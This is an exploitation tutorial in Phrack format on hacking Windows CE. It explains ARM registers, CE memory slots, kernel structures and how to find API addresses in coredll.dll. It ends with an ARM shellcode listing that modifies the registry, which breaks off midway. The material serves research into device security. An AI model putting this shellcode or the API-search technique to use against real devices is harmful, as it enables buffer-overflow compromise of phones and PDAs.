==Phrack Inc.==

Volume 0x0b, Issue 0x3f, Phile #0x06 of 0x14

|=----------------------------------------------------------------------=|
|=----------------------=[ Hacking Windows CE ]=------------------------=|
|=----------------------------------------------------------------------=|
|=----------------------=[ san <san@xfocus.org> ]=----------------------=|

--[ Contents

1 - Abstract

2 - Windows CE Overview

3 - ARM Architecture

4 - Windows CE Memory Management

5 - Windows CE Processes and Threads

6 - Windows CE API Address Search Technology

7 - The Shellcode for Windows CE

8 - System Call

9 - Windows CE Buffer Overflow Exploitation

10 - About Decoding Shellcode

11 - Conclusion

12 - Greetings

13 - References


--[ 1 - Abstract

The network features of PDAs and mobile phones are becoming more and more
powerful, so their security problems are attracting more and more
attention. This paper shows a buffer overflow exploitation example on
Windows CE. It covers the ARM architecture, memory management, and the
features of processes and threads in Windows CE. It also shows how to
write shellcode for Windows CE, including how to write decoding shellcode
for Windows CE on ARM processors.


--[ 2 - Windows CE Overview

Windows CE is a very popular embedded operating system for PDAs and
mobile phones. As the name suggests, it is developed by Microsoft. Because
its APIs are similar to those of desktop Windows, Windows developers can
easily write applications for Windows CE, which may be an important reason
for its popularity. Windows CE 5.0 is the latest version, but Windows
CE.net (4.2) is the most widely used version, and this paper is based on
Windows CE.net.

For marketing reasons, Windows Mobile Software for Pocket PC and
Smartphone are presented as independent products, but they are also based
on the Windows CE core.

By default, Windows CE runs in little-endian mode, and it supports several
processors.


--[ 3 - ARM Architecture

The ARM processor is the most popular chip in PDAs and mobile phones;
almost all of these embedded devices use an ARM CPU. ARM processors are
typical RISC processors in that they implement a load/store architecture:
only load and store instructions can access memory, and data processing
instructions operate on register contents only.

There are six major versions of the ARM architecture, denoted by the
version numbers 1 to 6.

ARM processors support up to seven processor modes, depending on the
architecture version. These modes are: User, FIQ (Fast Interrupt Request),
IRQ (Interrupt Request), Supervisor, Abort, Undefined and System. System
mode requires ARM architecture v4 or above. All modes except User mode
are referred to as privileged modes. Applications usually execute in User
mode, but on Pocket PC all applications appear to run in kernel mode; we
will come back to this later.

ARM processors have 37 registers. The registers are arranged in partially
overlapping banks, with a different register bank for each processor
mode. The banked registers allow rapid context switching when dealing
with processor exceptions and privileged operations.

In ARM architecture v3 and above, there are 30 general-purpose 32-bit
registers, the program counter (pc), the Current Program Status Register
(CPSR) and five Saved Program Status Registers (SPSRs). Fifteen
general-purpose registers, r0 to r14, are visible at any one time; which
physical registers they map to depends on the current processor mode.

By convention, r13 is used as the stack pointer (sp) in ARM assembly
language. The C and C++ compilers always use r13 as the stack pointer.

In User mode and System mode, r14 is used as the link register (lr) to
store the return address when a subroutine call is made. It can also be
used as a general-purpose register if the return address is saved on the
stack.

The program counter is accessed as r15 (pc). It is incremented by four
bytes for each instruction in ARM state, or by two bytes in Thumb state.
Branch instructions load the destination address into pc.

You can also load pc directly using data operation instructions. This
sets ARM apart from many other processors, and it is useful when writing
shellcode.


--[ 4 - Windows CE Memory Management

Understanding memory management is very important for buffer overflow
exploitation. Memory management in Windows CE is very different from
other operating systems, even other Windows systems.

Windows CE uses ROM (read-only memory) and RAM (random access memory).

The ROM stores the entire operating system, as well as the applications
that are bundled with the system. In this sense, the ROM in a Windows CE
system is like a small read-only hard disk. The data in ROM is retained
without battery power. ROM-based DLL files can be designated as Execute
in Place (XIP), a new feature of Windows CE.net. That is, they are
executed directly from the ROM instead of being loaded into program RAM
and then executed. This is a big advantage for embedded systems: the DLL
code doesn't take up valuable program RAM, and it doesn't have to be
copied into RAM before it is launched, so it takes less time to start an
application. DLL files that aren't in ROM but are contained in the object
store or on a Flash memory storage card aren't executed in place; they
are copied into RAM and then executed.

The RAM in a Windows CE system is divided into two areas: program memory
and the object store.

The object store can be thought of as a permanent virtual RAM disk.
Unlike the RAM disks on a PC, the object store keeps the files stored in
it even when the system is turned off. This is why Windows CE devices
typically have a main battery and a backup battery: they provide power
for the RAM to maintain the files in the object store. Even when the user
hits the reset button, the Windows CE kernel starts up looking for a
previously created object store in RAM and uses that store if it finds
one.

The other area of the RAM is used as program memory. Program memory is
used like the RAM in personal computers: it stores the heaps and stacks
of the running applications. The boundary between the object store and
the program RAM is adjustable. The user can move the dividing line between
object store and program RAM using the System Control Panel applet.

Windows CE is a 32-bit operating system, so it supports a 4GB virtual
address space. The layout is as follows:

+----------------------------------------+ 0xFFFFFFFF
|   |   |    Kernel Virtual Address:     |
|   | 2 |    KPAGE Trap Area,            |
|   | G |    KDataStruct, etc            |
|   | B |    ...                         |
|   |   |--------------------------------+ 0xF0000000
| 4 | K |  Static Mapped Virtual Address |
| G | E |    ...                         |
| B | R |    ...                         |
|   | N |--------------------------------+ 0xC4000000
| V | E |    NK.EXE                      |
| I | L |--------------------------------+ 0xC2000000
| R |   |    ...                         |
| T |   |    ...                         |
| U |---|--------------------------------+ 0x80000000
| A |   |    Memory Mapped Files         |
| L | 2 |    ...                         |
|   | G |--------------------------------+ 0x42000000
| A | B |    Slot 32 Process 32          |
| D |   |--------------------------------+ 0x40000000
| D | U |    ...                         |
| R | S |--------------------------------+ 0x08000000
| E | E |    Slot 3 DEVICE.EXE           |
| S | R |--------------------------------+ 0x06000000
| S |   |    Slot 2 FILESYS.EXE          |
|   |   |--------------------------------+ 0x04000000
|   |   |    Slot 1 XIP DLLs             |
|   |   |--------------------------------+ 0x02000000
|   |   |    Slot 0 Current Process      |
+---+---+--------------------------------+ 0x00000000

The upper 2GB is kernel space, used by the system for its own data. The
lower 2GB is user space. The range from 0x42000000 up to 0x80000000 is
used for large memory allocations such as memory-mapped files; the object
store also lives here. The range from 0 up to 0x42000000 is divided into
33 slots of 32MB each.

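The slot arithmetic above can be sketched in a few lines of C. This is only an illustration of the layout described in the text, not code from Windows CE; the names slot_of and slot_base are made up for this example.

```c
#include <assert.h>
#include <stdint.h>

#define SLOT_SHIFT    25u           /* 32MB = 1 << 25 */
#define SLOT_COUNT    33u           /* slots 0..32, as in the layout above */
#define SLOT_AREA_END 0x42000000u   /* first address above slot 32 */

/* Returns the slot number (0..32) that contains addr, or -1 if addr
 * lies outside the slot area (hypothetical helper). */
int slot_of(uint32_t addr)
{
    if (addr >= SLOT_AREA_END)
        return -1;
    return (int)(addr >> SLOT_SHIFT);
}

/* Returns the first address of the given slot (hypothetical helper). */
uint32_t slot_base(unsigned slot)
{
    assert(slot < SLOT_COUNT);
    return (uint32_t)slot << SLOT_SHIFT;
}
```

For example, slot_of(0x04000000) yields 2, the FILESYS.EXE slot in the diagram, and slot_base(32) yields 0x40000000.
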
Slot 0 is very important; it is used for the currently running process.
Its virtual address space layout is as follows:

+---+------------------------------------+ 0x02000000
|   |   DLL Virtual Memory Allocations   |
| S |   +--------------------------------|
| L |   |    ROM DLLs:R/W Data           |
| O |   |--------------------------------|
| T |   | RAM DLL+OverFlow ROM DLL:      |
| 0 |   | Code+Data                      |
|   |   +--------------------------------|
| C +------+-----------------------------|
| U        |                  A          |
| R        V                  |          |
| R +-------------------------+----------|
| E | General Virtual Memory Allocations |
| N |   +--------------------------------|
| T |   |  Process VirtualAlloc() calls  |
|   |   |--------------------------------|
| P |   |  Thread Stack                  |
| R |   |--------------------------------|
| O |   |  Process Heap                  |
| C |   |--------------------------------|
| E |   |  Thread Stack                  |
| S |---+--------------------------------|
| S |       Process Code and Data        |
|   |------------------------------------+ 0x00010000
|   |   Guard Section(64K)+UserKInfo     |
+---+------------------------------------+ 0x00000000

The first 64 KB is reserved by the OS. The process's code and data are
mapped from 0x00010000, followed by the stacks and heaps. DLLs are loaded
at the top of the slot. One of the new features of Windows CE.net is the
expansion of an application's virtual address space from 32 MB, in earlier
versions of Windows CE, to 64 MB, because Slot 1 is used for XIP DLLs.


--[ 5 - Windows CE Processes and Threads

Windows CE treats processes differently from other Windows systems.
Windows CE allows at most 32 processes to run at any one time. When the
system starts, at least four processes are created: NK.EXE, which
provides the kernel services and is always in slot 97 (97 * 32MB =
0xC2000000 in the layout above); FILESYS.EXE, which provides the file
system services and is always in slot 2; DEVICE.EXE, which loads and
maintains the device drivers for the system and is normally in slot 3;
and GWES.EXE, which provides the GUI support and is normally in slot 4.
Other processes, such as EXPLORER.EXE, are started as well.

Shell is an interesting process because it's not even in the ROM.
SHELL.EXE is the Windows CE side of CESH, the command line-based monitor.
The only way to load it is to connect the system to the PC debugging
station so that the file can be downloaded automatically from the PC.
When you use Platform Builder to debug a Windows CE system, SHELL.EXE is
loaded into the slot after FILESYS.EXE.

Threads under Windows CE are similar to threads under other Windows
systems. Each process has at least a primary thread associated with it
from the start, even if it never explicitly creates one. A process can
create any number of additional threads; it is limited only by available
memory.

Each thread belongs to a particular process and shares that process's
memory space, but SetProcPermissions(-1) gives the current thread access
to any process. Each thread has an ID, a private stack and a set of
registers. The stack size of all threads created within a process is set
by the linker when the application is built.

The IDs of processes and threads in Windows CE are the handles of the
corresponding process and thread. It's funny, but it's useful when
programming.

When a process is loaded, the system assigns it the next available slot.
Its DLLs are loaded into the slot, followed by the stack and the default
process heap, and then the process starts executing.

When a thread of a process is scheduled, the system copies the process
from its slot into slot 0. It isn't a real copy operation; the process
appears to be simply mapped into slot 0. It is mapped back to the slot
originally allocated to the process when the process becomes inactive.
The kernel, the file system and the windowing system all run in their own
slots.

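To make the slot 0 mapping concrete, here is a minimal sketch of the address arithmetic it implies, assuming a process owns one 32MB slot and sees the same memory at a slot 0 address while it is running. The function name to_slot_address is hypothetical, and this models only the arithmetic, not how the kernel actually remaps pages.

```c
#include <assert.h>
#include <stdint.h>

#define SLOT_SIZE 0x02000000u   /* 32MB per slot */

/* Translates an address seen by the running process into the address of
 * the same byte inside the slot that owns the process. Addresses outside
 * slot 0 are already absolute and are returned unchanged. */
uint32_t to_slot_address(uint32_t addr, unsigned slot)
{
    assert(slot >= 1 && slot <= 32);
    if (addr < SLOT_SIZE)
        return addr + slot * SLOT_SIZE;
    return addr;
}
```

Under this assumption, address 0x00011000 of a process living in slot 4 corresponds to 0x08011000 when the process is not the current one.
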
Each process allocates a stack for each thread. The default size is 64KB,
depending on the link parameter used when the program is built. The top
2KB is used to guard against stack overflow; we must not corrupt this
area, otherwise the system will freeze. The remainder is available for
use.

Variables declared inside functions are allocated on the stack. A
thread's stack memory is reclaimed when the thread terminates.


--[ 6 - Windows CE API Address Search Technology

Before we can exploit anything, we need shellcode that runs under Windows
CE. Windows CE implements a Win32-compatible API. Coredll.dll provides the
entry points for most of the APIs supported by Windows CE, so it is loaded
by every process. It plays the role that kernel32.dll and ntdll.dll play
on other Win32 systems. We have to find the addresses of the APIs we need
in coredll.dll and then use these APIs to implement our shellcode. The
traditional way to do this on other Win32 systems is to locate the base
address of kernel32.dll via the PEB structure and then search for API
addresses via the PE header.

First, we have to locate the base address of coredll.dll. Is there a
structure like the PEB under Windows CE? The answer is yes. KDataStruct is
an important kernel structure that can be accessed from user mode at the
fixed address PUserKData. It keeps important system data, such as the
module list, the kernel heap, and the API set pointer table
(SystemAPISets).

KDataStruct is defined in nkarm.h:

// WINCE420\PRIVATE\WINCEOS\COREOS\NK\INC\nkarm.h
struct KDataStruct {
    LPDWORD  lpvTls;         /* 0x000 Current thread local storage pointer */
    HANDLE   ahSys[NUM_SYS_HANDLES]; /* 0x004 If this moves, change kapi.h */
    char     bResched;       /* 0x084 reschedule flag */
    char     cNest;          /* 0x085 kernel exception nesting */
    char     bPowerOff;      /* 0x086 TRUE during "power off" processing */
    char     bProfileOn;     /* 0x087 TRUE if profiling enabled */
    ulong    unused;         /* 0x088 unused */
    ulong    rsvd2;          /* 0x08c was DiffMSec */
    PPROCESS pCurPrc;        /* 0x090 ptr to current PROCESS struct */
    PTHREAD  pCurThd;        /* 0x094 ptr to current THREAD struct */
    DWORD    dwKCRes;        /* 0x098 */
    ulong    handleBase;     /* 0x09c handle table base address */
    PSECTION aSections[64];  /* 0x0a0 section table for virtual memory */
    LPEVENT  alpeIntrEvents[SYSINTR_MAX_DEVICES];/* 0x1a0 */
    LPVOID   alpvIntrData[SYSINTR_MAX_DEVICES];  /* 0x220 */
    ulong    pAPIReturn;     /* 0x2a0 direct API return address for kernel mode */
    uchar    *pMap;          /* 0x2a4 ptr to MemoryMap array */
    DWORD    dwInDebugger;   /* 0x2a8 !0 when in debugger */
    PTHREAD  pCurFPUOwner;   /* 0x2ac current FPU owner */
    PPROCESS pCpuASIDPrc;    /* 0x2b0 current ASID proc */
    long     nMemForPT;      /* 0x2b4 - Memory used for PageTables */

    long     alPad[18];      /* 0x2b8 - padding */
    DWORD    aInfo[32];      /* 0x300 - misc. kernel info */
    // WINCE420\PUBLIC\COMMON\OAK\INC\pkfuncs.h
        #define KINX_PROCARRAY     0  /* 0x300 address of process array */
        #define KINX_PAGESIZE      1  /* 0x304 system page size */
        #define KINX_PFN_SHIFT     2  /* 0x308 shift for page # in PTE */
        #define KINX_PFN_MASK      3  /* 0x30c mask for page # in PTE */
        #define KINX_PAGEFREE      4  /* 0x310 # of free physical pages */
        #define KINX_SYSPAGES      5  /* 0x314 # of pages used by kernel */
        #define KINX_KHEAP         6  /* 0x318 ptr to kernel heap array */
        #define KINX_SECTIONS      7  /* 0x31c ptr to SectionTable array */
        #define KINX_MEMINFO       8  /* 0x320 ptr to system MemoryInfo struct */
        #define KINX_MODULES       9  /* 0x324 ptr to module list */
        #define KINX_DLL_LOW      10  /* 0x328 lower bound of DLL shared space */
        #define KINX_NUMPAGES     11  /* 0x32c total # of RAM pages */
        #define KINX_PTOC         12  /* 0x330 ptr to ROM table of contents */
        #define KINX_KDATA_ADDR   13  /* 0x334 kernel mode version of KData */
        #define KINX_GWESHEAPINFO 14  /* 0x338 Current amount of gwes heap in use */
        #define KINX_TIMEZONEBIAS 15  /* 0x33c Fast timezone bias info */
        #define KINX_PENDEVENTS   16  /* 0x340 bit mask for pending interrupt events */
        #define KINX_KERNRESERVE  17  /* 0x344 number of kernel reserved pages */
        #define KINX_API_MASK     18  /* 0x348 bit mask for registered api sets */
        #define KINX_NLS_CP       19  /* 0x34c hiword OEM code page, loword ANSI code page */
        #define KINX_NLS_SYSLOC   20  /* 0x350 Default System locale */
        #define KINX_NLS_USERLOC  21  /* 0x354 Default User locale */
        #define KINX_HEAP_WASTE   22  /* 0x358 Kernel heap wasted space */
        #define KINX_DEBUGGER     23  /* 0x35c For use by debugger for protocol communication */
        #define KINX_APISETS      24  /* 0x360 APIset pointers */
        #define KINX_MINPAGEFREE  25  /* 0x364 water mark of the minimum number of free pages */
        #define KINX_CELOGSTATUS  26  /* 0x368 CeLog status flags */
        #define KINX_NKSECTION    27  /* 0x36c Address of NKSection */
        #define KINX_PWR_EVTS     28  /* 0x370 Events to be set after power on */

        #define KINX_NKSIG        31  /* 0x37c last entry of KINFO -- signature when NK is ready */
        #define NKSIG     0x4E4B5347  /* signature "NKSG" */
                             /* 0x380 - interlocked api code */
                             /* 0x400 - end */
};  /* KDataStruct */

/* High memory layout
 *
 * This structure is mapped in at the end of the 4GB virtual
 * address space.
 *
 *  0xFFFD0000 - first level page table (uncached) (2nd half is r/o)
 *  0xFFFD4000 - disabled for protection
 *  0xFFFE0000 - second level page tables (uncached)
 *  0xFFFE4000 - disabled for protection
 *  0xFFFF0000 - exception vectors
 *  0xFFFF0400 - not used (r/o)
 *  0xFFFF1000 - disabled for protection
 *  0xFFFF2000 - r/o (physical overlaps with vectors)
 *  0xFFFF2400 - Interrupt stack (1k)
 *  0xFFFF2800 - r/o (physical overlaps with Abort stack & FIQ stack)
 *  0xFFFF3000 - disabled for protection
 *  0xFFFF4000 - r/o (physical memory overlaps with vectors & intr. stack & FIQ stack)
 *  0xFFFF4900 - Abort stack (2k - 256 bytes)
 *  0xFFFF5000 - disabled for protection
 *  0xFFFF6000 - r/o (physical memory overlaps with vectors & intr. stack)
 *  0xFFFF6800 - FIQ stack (256 bytes)
 *  0xFFFF6900 - r/o (physical memory overlaps with Abort stack)
 *  0xFFFF7000 - disabled
 *  0xFFFFC000 - kernel stack
 *  0xFFFFC800 - KDataStruct
 *  0xFFFFCC00 - disabled for protection (2nd level page table for 0xFFF00000)
 */


The value of PUserKData is fixed at 0xFFFFC800 on ARM processors, and at
0x00005800 on other CPUs. The last member of KDataStruct is aInfo, at
offset 0x300 from the start of the structure. aInfo is a DWORD array;
index 9 (KINX_MODULES, defined in pkfuncs.h) holds a pointer to the
module list. So the pointer to the module list is at offset 0x324 from
0xFFFFC800.

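The offset arithmetic in this paragraph can be checked with a short C sketch. The constants come from the listings above; the function names kinfo_offset and kinfo_address are invented for this illustration, and the code only computes addresses, it does not read kernel memory.

```c
#include <assert.h>
#include <stdint.h>

#define PUSERKDATA_ARM 0xFFFFC800u  /* PUserKData on ARM, from the text */
#define AINFO_OFFSET   0x300u       /* offset of aInfo in KDataStruct */
#define AINFO_ENTRIES  32u          /* DWORD aInfo[32] */
#define KINX_MODULES   9u           /* index of the module list pointer */

/* Offset of aInfo[index] from the start of KDataStruct. */
uint32_t kinfo_offset(unsigned index)
{
    assert(index < AINFO_ENTRIES);
    return AINFO_OFFSET + 4u * index;   /* each entry is a 4-byte DWORD */
}

/* Virtual address of aInfo[index] on ARM. */
uint32_t kinfo_address(unsigned index)
{
    return PUSERKDATA_ARM + kinfo_offset(index);
}
```

kinfo_offset(KINX_MODULES) gives 0x324, matching the annotated listing, and kinfo_address(KINX_MODULES) gives 0xFFFFCB24.
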
Now let's look at the Module structure. I have marked the offsets of its
members as follows:

// WINCE420\PRIVATE\WINCEOS\COREOS\NK\INC\kernel.h
typedef struct Module {
    LPVOID      lpSelf;         /* 0x00 Self pointer for validation */
    PMODULE     pMod;           /* 0x04 Next module in chain */
    LPWSTR      lpszModName;    /* 0x08 Module name */
    DWORD       inuse;          /* 0x0c Bit vector of use */
    DWORD       calledfunc;     /* 0x10 Called entry but not exit */
    WORD        refcnt[MAX_PROCESSES]; /* 0x14 Reference count per process*/
    LPVOID      BasePtr;        /* 0x54 Base pointer of dll load (not 0 based) */
    DWORD       DbgFlags;       /* 0x58 Debug flags */
    LPDBGPARAM  ZonePtr;        /* 0x5c Debug zone pointer */
    ulong       startip;        /* 0x60 0 based entrypoint */
    openexe_t   oe;             /* 0x64 Pointer to executable file handle */
    e32_lite    e32;            /* 0x74 E32 header */
    // WINCE420\PUBLIC\COMMON\OAK\INC\pehdr.h
        typedef struct e32_lite {           /* PE 32-bit .EXE header */
            unsigned short  e32_objcnt;     /* 0x74 Number of memory objects */
            BYTE            e32_cevermajor; /* 0x76 version of CE built for */
            BYTE            e32_ceverminor; /* 0x77 version of CE built for */
            unsigned long   e32_stackmax;   /* 0x78 Maximum stack size */
            unsigned long   e32_vbase;      /* 0x7c Virtual base address of module */
            unsigned long   e32_vsize;      /* 0x80 Virtual size of the entire image */
            unsigned long   e32_sect14rva;  /* 0x84 section 14 rva */
            unsigned long   e32_sect14size; /* 0x88 section 14 size */
            struct info     e32_unit[LITE_EXTRA]; /* 0x8c Array of extra info units */
            // WINCE420\PUBLIC\COMMON\OAK\INC\pehdr.h
                struct info {               /* Extra information header block */
                    unsigned long   rva;    /* Virtual relative address of info */
                    unsigned long   size;   /* Size of information block */
                }
            // WINCE420\PUBLIC\COMMON\OAK\INC\pehdr.h
                #define EXP         0       /* 0x8c Export table position */
                #define IMP         1       /* 0x94 Import table position */
                #define RES         2       /* 0x9c Resource table position */
                #define EXC         3       /* 0xa4 Exception table position */
                #define SEC         4       /* 0xac Security table position */
                #define FIX         5       /* 0xb4 Fixup table position */

                #define LITE_EXTRA  6       /* Only first 6 used by NK */
        } e32_lite, *LPe32_list;
    o32_lite    *o32_ptr;       /* 0xbc O32 chain ptr */
    DWORD       dwNoNotify;     /* 0xc0 1 bit per process, set if notifications disabled */
    WORD        wFlags;         /* 0xc4 */
    BYTE        bTrustLevel;    /* 0xc6 */
    BYTE        bPadding;       /* 0xc7 */
    PMODULE     pmodResource;   /* 0xc8 module that contains the resources */
    DWORD       rwLow;          /* 0xcc base address of RW section for ROM DLL */
    DWORD       rwHigh;         /* 0xd0 high address RW section for ROM DLL */
    PGPOOL_Q    pgqueue;        /* 0xd4 list of the page owned by the module */
} Module;


The Module structure is defined in kernel.h. Its third member is
lpszModName, a pointer to the module name string, at offset 0x08 from the
start of the structure. The module name is a Unicode string. The second
member is pMod, a pointer to the next module in the chain. So we can
locate the coredll module by walking the chain and comparing the Unicode
string of each module's name.

At offset 0x74 from the start of the Module structure is the e32 member,
an e32_lite structure defined in pehdr.h. In the e32_lite structure, the
member e32_vbase gives the virtual base address of the module; it is at
offset 0x7c from the start of the Module structure. Also note the member
e32_unit[LITE_EXTRA], an array of info structures. LITE_EXTRA is defined
as 6 in pehdr.h: only the first 6 entries are used by NK, and the first
one is the export table position. So offset 0x8c from the start of the
Module structure holds the relative virtual address of the module's export
table.

At this point we have the virtual base address of coredll.dll and the
relative virtual address of its export table.

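The search described above can be sketched in portable C. The struct mock_module below is a hypothetical stand-in that keeps only the four fields the search touches (the real offsets are noted in comments), so the example can run on any host instead of reading the kernel's real list.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical stand-in for the kernel's Module structure. */
struct mock_module {
    struct mock_module *next;     /* pMod,             0x04 in the real struct */
    const uint16_t     *name;     /* lpszModName,      0x08 */
    uint32_t            vbase;    /* e32_vbase,        0x7c */
    uint32_t            exp_rva;  /* e32_unit[EXP].rva, 0x8c */
};

/* Returns 1 when two NUL-terminated UTF-16 strings are identical. */
static int wstr_equal(const uint16_t *a, const uint16_t *b)
{
    while (*a != 0 && *a == *b) {
        a++;
        b++;
    }
    return *a == *b;
}

/* Walks the chain and returns the first module whose name matches,
 * or NULL when the end of the chain is reached. */
const struct mock_module *find_module(const struct mock_module *head,
                                      const uint16_t *wanted)
{
    const struct mock_module *m;

    assert(wanted != NULL);
    for (m = head; m != NULL; m = m->next) {
        if (m->name != NULL && wstr_equal(m->name, wanted))
            return m;
    }
    return NULL;
}
```

Once the coredll entry is found, vbase + exp_rva is the address of its export directory, which is the value the later lookup needs.
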
I wrote the following small program to list all modules of the system:

; SetProcessorMode.s

    AREA |.text|, CODE, ARM

    EXPORT |SetProcessorMode|
|SetProcessorMode| PROC
    mov     r1, lr     ; different modes use different lr - save it
    msr     cpsr_c, r0 ; assign control bits of CPSR
    mov     pc, r1     ; return

    END

// list.cpp
/*
...
01F60000 coredll.dll
*/

#include "stdafx.h"

extern "C" void __stdcall SetProcessorMode(DWORD pMode);

int WINAPI WinMain( HINSTANCE hInstance,
                    HINSTANCE hPrevInstance,
                    LPTSTR    lpCmdLine,
                    int       nCmdShow)
{
    FILE *fp;
    unsigned int KDataStruct = 0xFFFFC800;
    void *Modules     = NULL,
         *BaseAddress = NULL,
         *DllName     = NULL;

    // switch to user mode
    //SetProcessorMode(0x10);

    if ( (fp = fopen("\\modules.txt", "w")) == NULL )
    {
        return 1;
    }

    // aInfo[KINX_MODULES]
    Modules = *( ( void ** )(KDataStruct + 0x324));

    while (Modules) {
        BaseAddress = *( ( void ** )( ( unsigned char * )Modules + 0x7c ) );
        DllName     = *( ( void ** )( ( unsigned char * )Modules + 0x8 ) );

        fprintf(fp, "%08X %ls\n", BaseAddress, DllName);

        Modules = *( ( void ** )( ( unsigned char * )Modules + 0x4 ) );
    }

    fclose(fp);
    return(EXIT_SUCCESS);
}

In my environment, the Module structure is at 0x8F453128, which is in
kernel space. Most Pocket PC ROMs were built with the Enable Full Kernel
Mode option, so all applications appear to run in kernel mode. When
debugging, the low 5 bits of the Psr register are 0x1F, which means the
ARM processor is running in System mode. The mode values are defined in
nkarm.h:

// ARM processor modes
#define USER_MODE   0x10    // 0b10000
#define FIQ_MODE    0x11    // 0b10001
#define IRQ_MODE    0x12    // 0b10010
#define SVC_MODE    0x13    // 0b10011
#define ABORT_MODE  0x17    // 0b10111
#define UNDEF_MODE  0x1b    // 0b11011
#define SYSTEM_MODE 0x1f    // 0b11111

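As a small illustration of how these values are used, the following C sketch decodes the mode field of a status register value. The mode constants are the ones listed above; the helper names and the sample register values are assumptions made for this example.

```c
#include <assert.h>
#include <stdint.h>

#define MODE_MASK   0x1Fu   /* low 5 bits of the status register */
#define USER_MODE   0x10u
#define FIQ_MODE    0x11u
#define IRQ_MODE    0x12u
#define SVC_MODE    0x13u
#define ABORT_MODE  0x17u
#define UNDEF_MODE  0x1Bu
#define SYSTEM_MODE 0x1Fu

/* Returns a readable name for the mode encoded in psr. */
const char *arm_mode_name(uint32_t psr)
{
    switch (psr & MODE_MASK) {
    case USER_MODE:   return "User";
    case FIQ_MODE:    return "FIQ";
    case IRQ_MODE:    return "IRQ";
    case SVC_MODE:    return "Supervisor";
    case ABORT_MODE:  return "Abort";
    case UNDEF_MODE:  return "Undefined";
    case SYSTEM_MODE: return "System";
    default:          return "Unknown";
    }
}

/* Every mode except User is privileged. */
int arm_mode_is_privileged(uint32_t psr)
{
    return (psr & MODE_MASK) != USER_MODE;
}

/* Returns psr with its mode field replaced by mode; this is the kind of
 * value a routine like SetProcessorMode would write to cpsr_c. */
uint32_t arm_with_mode(uint32_t psr, uint32_t mode)
{
    assert((mode & ~MODE_MASK) == 0);
    return (psr & ~MODE_MASK) | mode;
}
```

A status value whose low 5 bits are 0x1F decodes as System mode and is reported as privileged, which is what the debugger observation above describes.
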
I wrote a small assembly function to switch the processor mode because
EVC doesn't support inline assembly. When I switched the processor to
User mode, the program could no longer read BaseAddress and DllName; it
raised an access violation exception.

Without changing the processor mode, this program reports the virtual
base address of coredll.dll as 0x01F60000. But this address is invalid
when I inspect it with the EVC debugger; the valid data starts at
0x01F61000. I think Windows CE doesn't load the header of DLL files,
perhaps to save memory or time.

Now that we have the virtual base address of coredll.dll and the relative
virtual address of its export table, we can get an API's address by
comparing the API name against each entry of the IMAGE_EXPORT_DIRECTORY
structure. The IMAGE_EXPORT_DIRECTORY structure is the same as on other
Win32 systems and is defined in winnt.h:

// WINCE420\PUBLIC\COMMON\SDK\INC\winnt.h
typedef struct _IMAGE_EXPORT_DIRECTORY {
    DWORD   Characteristics;        /* 0x00 */
    DWORD   TimeDateStamp;          /* 0x04 */
    WORD    MajorVersion;           /* 0x08 */
    WORD    MinorVersion;           /* 0x0a */
    DWORD   Name;                   /* 0x0c */
    DWORD   Base;                   /* 0x10 */
    DWORD   NumberOfFunctions;      /* 0x14 */
    DWORD   NumberOfNames;          /* 0x18 */
    DWORD   AddressOfFunctions;     // 0x1c RVA from base of image
    DWORD   AddressOfNames;         // 0x20 RVA from base of image
    DWORD   AddressOfNameOrdinals;  // 0x24 RVA from base of image
} IMAGE_EXPORT_DIRECTORY, *PIMAGE_EXPORT_DIRECTORY;

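The name lookup through this structure can be sketched as follows. This is a host-side illustration that operates on a byte buffer holding a module image; the function find_export_rva and its helpers are hypothetical names, and the sketch compares names directly rather than by hash.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Field offsets inside IMAGE_EXPORT_DIRECTORY, as annotated above. */
enum {
    EXP_NUMBER_OF_NAMES = 0x18,
    EXP_ADDR_FUNCTIONS  = 0x1c,
    EXP_ADDR_NAMES      = 0x20,
    EXP_ADDR_ORDINALS   = 0x24
};

/* Little-endian reads that make no alignment assumptions. */
static uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

static uint16_t rd16(const uint8_t *p)
{
    return (uint16_t)(p[0] | p[1] << 8);
}

/* image:   start of the module image (all RVAs are relative to it)
 * exp_rva: RVA of the export directory
 * Returns the RVA of the named function, or 0 if it is not exported. */
uint32_t find_export_rva(const uint8_t *image, uint32_t exp_rva,
                         const char *wanted)
{
    const uint8_t *dir;
    uint32_t count, functions, names, ordinals, i;

    assert(image != NULL && wanted != NULL);
    dir       = image + exp_rva;
    count     = rd32(dir + EXP_NUMBER_OF_NAMES);
    functions = rd32(dir + EXP_ADDR_FUNCTIONS);
    names     = rd32(dir + EXP_ADDR_NAMES);
    ordinals  = rd32(dir + EXP_ADDR_ORDINALS);

    for (i = 0; i < count; i++) {
        uint32_t name_rva = rd32(image + names + 4u * i);
        if (strcmp((const char *)(image + name_rva), wanted) == 0) {
            /* The i-th name maps to the i-th ordinal, which in turn
             * indexes the function table. */
            uint16_t ord = rd16(image + ordinals + 2u * i);
            return rd32(image + functions + 4u * ord);
        }
    }
    return 0;
}
```

Adding the returned RVA to the module's base address gives the callable address of the API.
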
--[ 7 - The Shellcode for Windows CE

There are a few things to note before writing shellcode for Windows CE.
Windows CE passes the first four parameters of an API call in r0-r3; if
an API takes more than four parameters, the remaining ones are passed on
the stack. So the shellcode must be written carefully, because the
shellcode itself will sit on the stack. test.asm is our shellcode:

; Idea from WinCE4.Dust written by Ratter/29A
;
; API Address Search
; san@xfocus.org
;
; armasm test.asm
; link /MACHINE:ARM /SUBSYSTEM:WINDOWSCE test.obj

    CODE32

    EXPORT  WinMainCRTStartup

    AREA    .text, CODE, ARM

test_start

; r11 - base pointer
test_code_start   PROC
    bl      get_export_section

    mov     r2, #4                  ; functions number
    bl      find_func

    sub     sp, sp, #0x89, 30       ; weird after buffer overflow

    add     r0, sp, #8
    str     r0, [sp]
    mov     r3, #2
    mov     r2, #0
    adr     r1, key
    mov     r0, #0xA, 2
    mov     lr, pc
    ldr     pc, [r8, #-12]          ; RegOpenKeyExW

    mov     r0, #1
    str     r0, [sp, #0xC]
    mov     r3, #4
    str     r3, [sp, #4]
    add     r1, sp, #0xC
    str     r1, [sp]
    ;mov     r2, #0
    adr     r1, val
    ldr     r0, [sp, #8]
    mov     lr, pc
    ldr     pc, [r8, #-8]           ; RegSetValueExW

    ldr     r0, [sp, #8]
    mov     lr, pc
    ldr     pc, [r8, #-4]           ; RegCloseKey

    adr     r0, sf
    ldr     r0, [r0]
    ;ldr     r0, =0x0101003c
